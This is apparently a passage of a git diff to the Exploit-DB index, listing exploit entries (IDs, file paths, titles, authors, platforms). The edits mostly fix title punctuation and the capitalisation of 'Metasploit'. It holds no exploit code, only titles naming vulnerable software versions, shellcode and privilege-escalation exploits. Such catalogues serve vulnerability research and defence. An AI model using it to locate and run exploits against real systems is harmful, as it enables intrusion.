'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,php,webapps,0 35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote,0 -35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 -35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 +35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 -35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 +35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 -35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection",2011-05-07,KedAns-Dz,php,webapps,0 +35709,platforms/php/webapps/35709.txt,"e107 0.7.25 - 'news.php' SQL Injection",2011-05-07,KedAns-Dz,php,webapps,0 35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0 35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 'login.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 +35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 -35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 'index.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 +35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 +35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 -35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 -35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 +35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 +35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Include",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Auth Bypass and Arbitrary File Upload",2015-01-08,metasploit,php,remote,80 +35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Auth Bypass and Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80 -35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 +35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 @@ -32203,7 +32203,7 @@ id,file,description,date,author,platform,type,port 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 -35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 +35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ‏sfan55",linux,local,0 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 @@ -32214,13 +32214,13 @@ id,file,description,date,author,platform,type,port 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service",2011-05-16,Knud,multiple,dos,0 -35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 -35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 'history.php' Cross Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 -35756,platforms/php/webapps/35756.txt,"openQRM 4.8 'source_tab' Parameter Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 -35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 'scripts.php' Local File Include",2011-05-16,"AutoSec Tools",php,webapps,0 -35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 'submitScore.php' Cross Site Scripting",2011-05-16,"John Leitch",php,webapps,0 +35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 +35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 - 'scripts.php' Local File Include",2011-05-16,"AutoSec Tools",php,webapps,0 +35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross Site Scripting",2011-05-16,"John Leitch",php,webapps,0 35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 -35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 'origurl' Parameter Cross Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 +35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 - 'origurl' Parameter Cross Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager <= 8.5 iptm/advancedfind.do extn Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager <= 8.5 iptm/ddv.do deviceInstanceName Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 @@ -32235,15 +32235,15 @@ id,file,description,date,author,platform,type,port 35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 -35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788 -35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0 -35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 - Shell Upload",2015-01-13,metasploit,php,remote,80 +35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 +35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 +35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 - Shell Upload",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework <= 3.1.1 Help Servlet Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager <= 8.5 Common Services Device Center Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services <= 3.1.1 Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 -35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 'display.php' Cross Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 -35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 -35784,platforms/linux/remote/35784.php,"Zend Framework <= 1.11.4 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 +35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 +35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 +35784,platforms/linux/remote/35784.php,"Zend Framework <= 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 @@ -32254,19 +32254,19 @@ id,file,description,date,author,platform,type,port 35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0 -35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 +35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0 -35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 +35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 -35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 -35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 -35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 +35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 +35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 +35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 @@ -32275,30 +32275,30 @@ id,file,description,date,author,platform,type,port 35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0 35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 -35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 -35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 +35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 +35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35823,platforms/php/webapps/35823.txt,"WordPress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 -35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 +35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection",2011-07-25,FL0RiX,php,webapps,0 +35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 - 'com_virtualmoney' Component SQL Injection",2011-07-25,FL0RiX,php,webapps,0 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 -35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 +35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 -35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 -35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include",2011-06-07,ITSecTeam,php,webapps,0 +35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 +35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Include",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 -35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 +35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 -35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 +35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 - 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220/1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0 35993,platforms/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 @@ -32306,7 +32306,7 @@ id,file,description,date,author,platform,type,port 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 -35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080 +35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 @@ -32322,22 +32322,22 @@ id,file,description,date,author,platform,type,port 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0 35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80 -35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 +35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0 35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0 -35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 +35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 -35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 +35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass",2011-06-22,128bit,asp,webapps,0 35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 -35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 +35876,platforms/windows/dos/35876.html,"Easewe 